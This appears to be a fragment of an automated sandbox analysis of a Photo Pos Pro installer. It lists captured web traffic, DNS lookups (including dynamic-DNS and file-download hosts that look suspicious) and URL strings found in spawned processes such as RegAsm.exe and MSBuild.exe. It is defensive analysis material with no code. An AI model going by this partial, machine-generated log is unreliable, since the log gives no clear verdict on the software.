                  Source: global trafficHTTP traffic detected: GET /hads-ak-prn2/1487645_6012475414660_1439393861_n.png HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/sodar?id=sodar2&v=232&t=2&li=gda_r20250218&jk=1079719830296918&bg=!7u2l7aLNAAZ8UNegXFA7ADQBe5WfOJlmA-DZUpE0j98xbWLMW519v2jlMCJCtInHNsa5MsXEZWVLLvOV4LZhnDbc8ZE5AgAAAo9SAAAADGgBB34ANkUuB_kGg2tLFaNCA7E7_aNQfO8xwV2U8rFESlTRQP7RuFODD4VSvnfDx6-t3_8egdlRCnRLP5kClB4wcQBXwHYPA5Yv_ec2pN52YwyZHuFyVDKMdVOFYF3C3V-YI5lshtV22Nbgw9t9JQSPppJEhIF55qsFQna7sOWGbTVkcIzJZqBMPt8ojLPdhsARmwyNAfkICvo-pCwJBT0elHdWF--PAgKWDgPqNHncCWuTfXk4MxEYd7bccz7kbHG7rn9qeTaUhDN2viaUmXlRZDmifLMAnIUsN4TjpzNPyVucvu7K-Dg3qEGhBJzKdzOD2SnXlrwFSzIlj4fr7vo8dOZ-fKQ8_YiVnNmQOPWpnzSr34evewp2LtwkwugY0rhECXfitUPw9GzGohpP9OIkD4nWFTQAWAtYh1WJOgmsQjXadSifMXcaMznQ4CV3DZlx8-ElNZJh-xnYJtUVZgfmD1oplYJlNeR8VEoLQTqbX-98IbOEdb7hbxb4ea2seLpogtL-lODZLb5graEyJMEs0vr-V-upyydohQ-4zqW7B8YYK_yf4Kuxk805b1xTAaRpQJfJZDY59IcjTNoAp7mv7PBixtHLOCAgIPNnOZXhdjLiMnGyc5s9LY8hARcr8fQbRJhyXJ5bUhzXo9uL1bN0zVKyXY2YJoWxuQ0WT5GlP3BFdJq9AvD59vwrUBvFtaANlGx72mXYz6ysxE9LlxtcgQccIJWA9PnExXc9Qqk2aWt2bKQaWKSAiN_zbOcR3YzLw9nB7JQ0-4Kw3Mu0JDoxUp2XbdxNWkEKAzJ3CUidJRkqtRzoilHFJmuWhARWtT2vcDsLicW--Rt-kRyLwmOnrATOUXp2spNG52hf2oL24S-G5ChCAVKd-NncpTGTgZcfsiROWrhV4diLjty3h1-qrBIxur6TeRGfTR3Uw3QUD1VJ82BH7faKvW4lvYHa6OdU6A HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yI/r/4jGkrolTMU7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-1/325666997_1585103711933804_239555497008707502_n.png?stp=cp0_dst-png_s50x50&_nc_cat=103&ccb=1-7&_nc_sid=fe756c&_nc_ohc=AsIchfz5busQ7kNvgHgp8ZW&_nc_oc=AdgVdDdktMQdaWkhVa4Ss5luDveChM93ScZwPv9yLFWtDnTkYkghxWMad3NUfB8QYJk&_nc_zt=24&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYCMsN2qFPW5D3XpRflFxLH8eYoRVLf1MYdh1nK4t89ogA&oe=67C10037 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/472812542_9010286035729831_389804098435164931_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=101&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=wdxhRLNQXp0Q7kNvgFxREkC&_nc_oc=AdgIky26HhfEYMXW1VpJ41H0qO9zEz1Xbz0YxcYwmL0KG6FhrqK9tFZhyzIyk7FXQtI&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYBDjtwY9PIGAvCuIwUQvWU96xAH12w2uScduy2fFrQO8g&oe=67C11E73 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/101966363_3041025909322570_750950911169265664_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=106&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=MAXqGaKFQTQQ7kNvgF7FXfa&_nc_oc=Adi-IVyrb1EixvFUTyCVSMJvY7_SKawU9pJvD8Ld0vmKuTOkLmeQ1MjgO1KldD-_YiU&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDbBXZA0UAFixfLcZouHK7vA0ZUVbIj54LDnELyGLV7XA&oe=67E2BFA6 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/125374536_3505762139515609_345486544270513144_n.jpg?stp=dst-jpg_p118x90_tt6&_nc_cat=110&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=z739BLmmcA4Q7kNvgEOWtTs&_nc_oc=AdjLpKzxVyp7jZvQHoQmPgf8oTb7o7gAASO8BUoFVVTYZeutOaL4DTE4uUdPFpfYYNQ&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYCulKjxuzZ63rFVKR4VPqqF-J5SbDmqlnsQLfz6U5PaMw&oe=67E2C244 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/125369428_3505762246182265_5743839440214211017_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=101&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=9AjSTXarM-kQ7kNvgGVIC-D&_nc_oc=Adhnw0dk2IYfcmwgiW-JPHHkapbhjv7Gmt4rwA2w0P__GbWr7H7fakQCtD9gIY319fg&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDfr9Q-xxWT989X6hsw_b69hjOfyAfUPrkVOFW-K2vEYA&oe=67E29E74 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yw/r/UXtr_j2Fwe-.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yG/r/mhLQdv6ozV0.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4iEBX4/ya/l/en_US/Yi1EwSfun-P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.10873-6/36920094_248623919067915_1424366723364028416_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=427b5c&_nc_ohc=bu5-VaXi4fwQ7kNvgGJcjlI&_nc_oc=AdiD40mVpUZmk0DWvMyx7R5-S3CWzQZW7wqeVx7XV3ZWO0zBhF2EQqM118EVRoySOjw&_nc_zt=14&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYD2gAZGZ7M17JU34nWKQz-5jC-xyjZVfxFrjrXZ9kDfrg&oe=67C12E14 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/y9/r/ie38mp0O07P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __gads=ID=4688b6cfea46fcf5:T=1740326326:RT=1740326326:S=ALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A; __gpi=UID=000010400d671c69:T=1740326326:RT=1740326326:S=ALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw; __eoi=ID=a73a950e8b687589:T=1740326326:RT=1740326326:S=AA-AfjYWjoKZSzCfr3rfuQpOlQZP; __utmb=248137542.2.10.1740326324; _ga_0XL7LCZSXK=GS1.1.1740326323.1.1.1740326336.0.0.0; FCNEC=%5B%5B%22AKsRol-3Qf8gJ-rF49Wgvi8_Epm1Lt7yoElDaKVoSvCE-EixBOvwOmOySMouVCWWvjp3GeLbQ4svI8YtM3kMvc2S5ywlKQNTdRmQTchYemC73GKzeelZW3EKBHXeo27qFvCa_f6d77CywGBdktZLNpEAdALP_7yZaQ%3D%3D%22%5D%5D
                  Source: global trafficHTTP traffic detected: GET /v/t39.10873-6/37014161_191762008158040_6559530399574261760_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=427b5c&_nc_ohc=Hf0Zl4qeu3AQ7kNvgEPDOEn&_nc_oc=AdhAUOIRjaHU9zGCLph-Hh6HQsfrwVTulHSAqOjuxeXm2ST5jhNSASKwS5KElNxxYiQ&_nc_zt=14&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYBqOi-Bl8FaWGA-9dG1PrBIevi_LLzgJVjDts1e6cR4SQ&oe=67C11C79 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /hads-ak-prn2/1487645_6012475414660_1439393861_n.png HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6HzE4e685KbwKBAgdEd85C5U4e1Fx-ewpU3WwvE3vx60Vo1upEdEnwcG0RU2Cw8G0um4o5-0km7o1O81u81x82ewnE0Ca0h-0Lo6-0Co1kU1UU3jwea&__hs=20142.BP%3Aplugin_default_pkg.2.0...0&__hsi=7474644770697339681&__req=1&__rev=1020327201&__s=%3A%3A8p3uv8&__sp=1&__user=0&dpr=1&jazoest=21916&locale=en_US&lsd=MOeFSMwt0wQAt2cTHdn6Sq HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro HTTP/1.1Host: www.photopos.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/PPP3Help.aspx HTTP/1.1Host: www.photopos.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                  Source: global trafficDNS traffic detected: DNS query: vpnl.net
                  Source: global trafficDNS traffic detected: DNS query: filekg-download-01.fra1.cdn.digitaloceanspaces.com
                  Source: global trafficDNS traffic detected: DNS query: www.photopos.com
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
                  Source: global trafficDNS traffic detected: DNS query: www.paypalobjects.com
                  Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
                  Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
                  Source: global trafficDNS traffic detected: DNS query: s0.2mdn.net
                  Source: global trafficDNS traffic detected: DNS query: fundingchoicesmessages.google.com
                  Source: global trafficDNS traffic detected: DNS query: contextual.media.net
                  Source: global trafficDNS traffic detected: DNS query: lg3.media.net
                  Source: global trafficDNS traffic detected: DNS query: hblg.media.net
                  Source: global trafficDNS traffic detected: DNS query: jojo.ath.cx
                  Source: global trafficDNS traffic detected: DNS query: c21lg-d.media.net
                  Source: global trafficDNS traffic detected: DNS query: ep1.adtrafficquality.google
                  Source: global trafficDNS traffic detected: DNS query: www.facebook.com
                  Source: global trafficDNS traffic detected: DNS query: ep2.adtrafficquality.google
                  Source: global trafficDNS traffic detected: DNS query: static.xx.fbcdn.net
                  Source: global trafficDNS traffic detected: DNS query: scontent.xx.fbcdn.net
                  Source: unknownHTTP traffic detected: POST /el/AGSKWxVU1lURF8vKEN23njv0Ea3Hh78g3_e_VZqg1aJ2dSJOm5ltKn8U8mZxsvwwXnCd88fKv_AhWw3lH3CWr1Jb6HPJ-3YaLAYeh6BSbfE0f2Gj7lev-84V9vtnbxPQEKcQbDQUVO2vJw== HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveContent-Length: 247sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plainAccept: */*Origin: https://www.photopos.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Sun, 23 Feb 2025 15:59:20 GMTConnection: closeContent-Length: 1245
                  Source: vcredist_x64.exe, 00000017.00000002.2087090753.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000017.00000000.2073125075.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000018.00000002.2085203247.000000000017B000.00000002.00000001.01000000.00000012.sdmp, vcredist_x64.exe, 00000018.00000000.2074854131.000000000017B000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
                  Source: svchost.exe, 0000001A.00000002.2972912268.00000168FDA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: MSBuild.exe, 00000025.00000002.2971313710.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: MSBuild.exe, 00000025.00000002.2971313710.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en5
                  Source: svchost.exe, 0000001A.00000002.2973866688.00000168FDAE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 0000001A.00000002.2970607936.00000168FCD02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2927976292.00000168FD952000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2973054833.00000168FDA2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2972912268.00000168FDA00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2973866688.00000168FDACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/achozit4cnqsyorf5tenbf3aqc6q_2025.2.12.0/
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDC4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: svchost.exe, 0000001A.00000002.2973549435.00000168FDA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
                  Source: svchost.exe, 0000001A.00000002.2968977752.00000168FC4A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/achozit4cnqsyorf5tenbf3aqc6q_2025.2.12
                  Source: svchost.exe, 0000001A.00000003.2092444002.00000168FDD07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002BB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filekg-download-01.fra1.cdn.digitaloceanspaces.com
                  Source: powershell.exe, 00000010.00000002.2506223043.00000275E8112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951469907.000001F11BFB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000002.2284207198.000000000074D000.00000004.00000020.00020000.00000000.sdmp, PhotoPosPro4_SetUp.exe_tmp.exe, 0000000E.00000003.2283121035.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://photopos.com/ppp3_wp/buy-photo-pos-pro-photo-editor/
                  Source: PhotoPosPro4_SetUp.exeString found in binary or memory: http://schemas.micr
                  Source: powershell.exe, 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000010.00000002.2238400859.00000275D80A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1936741997.000001F10BF41000.00000004.00000800.00020000.00000000.sdmp, PhotoPosPro_PreInstaller.exe, 00000019.00000002.2104271799.0000000003381000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2982481428.0000000002C18000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2982481428.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Photo Pos Pro 4.exe, 0000001E.00000002.2987690943.00000202B5AD1000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2727036989.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2727036989.0000000002751000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2982455411.0000000002984000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1808709809.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, PhotoPosPro4_SetUp.exe, 00000000.00000003.1711280324.00000000053D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://standards.iso.org/iso/19770/-2/2008/schema.xsd
                  Source: Photo Pos Pro 4.exe, 0000001E.00000002.3114655910.00000202D1212000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://tempuri.org/
                  Source: vcredist_x64.exe, 00000018.00000003.2083243896.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, vcredist_x64.exe, 00000018.00000003.2084268133.0000000000CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000014.00000002.1936741997.000001F10C168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: PhotoPosPro_PreInstaller.exe, 00000019.00000002.2106701717.0000000007572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
